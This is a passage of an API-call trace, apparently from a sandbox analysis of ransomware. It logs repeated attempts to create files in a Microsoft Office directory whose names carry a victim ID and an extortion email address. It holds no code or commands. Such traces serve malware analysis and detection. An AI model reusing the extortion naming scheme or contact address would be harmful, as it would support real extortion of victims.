(hObject=0x530) returned 1 [0176.394] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.394] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR13F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir13f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.394] CloseHandle (hObject=0x530) returned 1 [0176.395] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.395] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR14F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir14f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.396] CloseHandle (hObject=0x530) returned 1 [0176.397] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.397] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR15F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir15f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.397] CloseHandle (hObject=0x530) returned 1 [0176.398] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.398] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR16F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir16f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.398] CloseHandle (hObject=0x530) returned 1 [0176.399] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.399] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR17F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir17f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.400] CloseHandle (hObject=0x530) returned 1 [0176.400] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.400] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR18F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir18f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.401] CloseHandle (hObject=0x530) returned 1 [0176.606] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.606] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR19F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir19f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.718] CloseHandle (hObject=0x544) returned 1 [0176.859] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.859] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR50B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir50b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.859] CloseHandle (hObject=0x52c) returned 1 [0176.860] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.860] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR44F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir44f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.861] CloseHandle (hObject=0x52c) returned 1 [0176.862] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.862] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR45B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir45b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.862] CloseHandle (hObject=0x52c) returned 1 [0176.863] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.863] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR45F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir45f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.863] CloseHandle (hObject=0x52c) returned 1 [0176.864] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.864] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR46B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir46b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.864] CloseHandle (hObject=0x52c) returned 1 [0176.865] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.865] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR46F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir46f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.865] CloseHandle (hObject=0x52c) returned 1 [0176.866] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.866] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR47B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir47b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.866] CloseHandle (hObject=0x52c) returned 1 [0176.867] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.867] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR47F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir47f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.867] CloseHandle (hObject=0x52c) returned 1 [0176.868] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.868] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR48B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir48b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.868] CloseHandle (hObject=0x52c) returned 1 [0176.869] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.869] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR48F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir48f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.869] CloseHandle (hObject=0x52c) returned 1 [0176.871] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.871] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR49B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir49b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.871] CloseHandle (hObject=0x52c) returned 1 [0176.872] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.872] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR49F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir49f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.872] CloseHandle (hObject=0x52c) returned 1 [0176.873] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.873] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR4B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir4b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.873] CloseHandle (hObject=0x52c) returned 1 [0176.874] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.874] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR4F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir4f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.874] CloseHandle (hObject=0x52c) returned 1 [0176.875] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.875] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR50B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir50b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.875] CloseHandle (hObject=0x52c) returned 1 [0176.876] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.876] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR50F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir50f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.876] CloseHandle (hObject=0x52c) returned 1 [0176.877] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.877] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR51B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir51b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.877] CloseHandle (hObject=0x52c) returned 1 [0176.878] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.878] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR51F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir51f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.878] CloseHandle (hObject=0x52c) returned 1 [0176.879] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.880] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR5B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir5b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.880] CloseHandle (hObject=0x52c) returned 1 [0176.881] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.881] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR5F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir5f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.881] CloseHandle (hObject=0x52c) returned 1 [0176.883] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.883] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.883] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR6B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir6b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.884] CloseHandle (hObject=0x52c) returned 1 [0176.884] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.884] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR6F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir6f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.885] CloseHandle (hObject=0x52c) returned 1 [0176.885] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.885] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR7B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir7b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.886] CloseHandle (hObject=0x52c) returned 1 [0176.886] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.886] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR7F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir7f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.887] CloseHandle (hObject=0x52c) returned 1 [0176.887] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.888] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, 